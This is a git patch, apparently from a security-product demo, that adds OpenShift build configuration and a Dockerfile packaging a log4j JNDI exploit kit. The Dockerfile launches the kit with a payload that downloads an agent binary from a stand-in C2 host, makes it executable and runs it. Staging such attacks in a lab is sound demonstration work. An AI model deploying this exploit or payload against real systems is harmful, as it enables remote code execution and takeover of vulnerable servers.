From 5dcb669b9c10779788f4eb0c2a09b4e5276716bf Mon Sep 17 00:00:00 2001
From: Nicolas MASSE <nicolas.masse@itix.fr>
Date: Wed, 23 Feb 2022 13:38:36 +0100
Subject: [PATCH] build exploitkit

---
 cicd/01-imagestream.yaml |  9 +++++++++
 cicd/02-buildconfig.yaml | 29 +++++++++++++++++++++++++++++
 exploit/Dockerfile       |  4 ++++
 3 files changed, 42 insertions(+)
 create mode 100644 exploit/Dockerfile

diff --git a/cicd/01-imagestream.yaml b/cicd/01-imagestream.yaml
index 2bfb0f9..6067076 100644
--- a/cicd/01-imagestream.yaml
+++ b/cicd/01-imagestream.yaml
@@ -6,3 +6,12 @@ metadata:
   name: vulnerable-log4j
   namespace: vulnerable-cicd
 spec:
+---
+kind: ImageStream
+apiVersion: image.openshift.io/v1
+metadata:
+  annotations:
+    openshift.io/display-name: Exploit for log4j
+  name: exploitkit-log4j
+  namespace: vulnerable-cicd
+spec:
diff --git a/cicd/02-buildconfig.yaml b/cicd/02-buildconfig.yaml
index 6ac2c38..67a3b9c 100644
--- a/cicd/02-buildconfig.yaml
+++ b/cicd/02-buildconfig.yaml
@@ -26,3 +26,32 @@ spec:
       imageChange: {}
     - type: ConfigChange
   runPolicy: Serial
+---
+kind: BuildConfig
+apiVersion: build.openshift.io/v1
+metadata:
+  name: exploitkit-log4j
+  namespace: vulnerable-cicd
+spec:
+  output:
+    to:
+      kind: ImageStreamTag
+      name: 'exploitkit-log4j:latest'
+  strategy:
+    type: Docker
+    dockerStrategy:
+      from:
+        kind: ImageStreamTag
+        namespace: openshift
+        name: 'java:11'
+  source:
+    type: Git
+    git:
+      uri: 'https://github.com/nmasse-itix/demo-rhacs.git'
+      ref: main
+    contextDir: exploit
+  triggers:
+    - type: ImageChange
+      imageChange: {}
+    - type: ConfigChange
+  runPolicy: Serial
diff --git a/exploit/Dockerfile b/exploit/Dockerfile
new file mode 100644
index 0000000..c8d08f9
--- /dev/null
+++ b/exploit/Dockerfile
@@ -0,0 +1,4 @@
+FROM docker.io/library/openjdk:11
+
+RUN curl -Lo /JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar https://github.com/pimps/JNDI-Exploit-Kit/raw/master/target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar
+CMD [ "java", "-jar", "/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar", "-C", "curl -o /tmp/agent.bin https://c2-server.attacker/agent.bin ; chmod 755 /tmp/agent.bin ; /tmp/agent.bin", "-J", "jndi-exploit-kit.exploitkit-log4.svc:8080", "-L", "jndi-exploit-kit.exploitkit-log4.svc:1389", "-R", "jndi-exploit-kit.exploitkit-log4.svc:1099" ]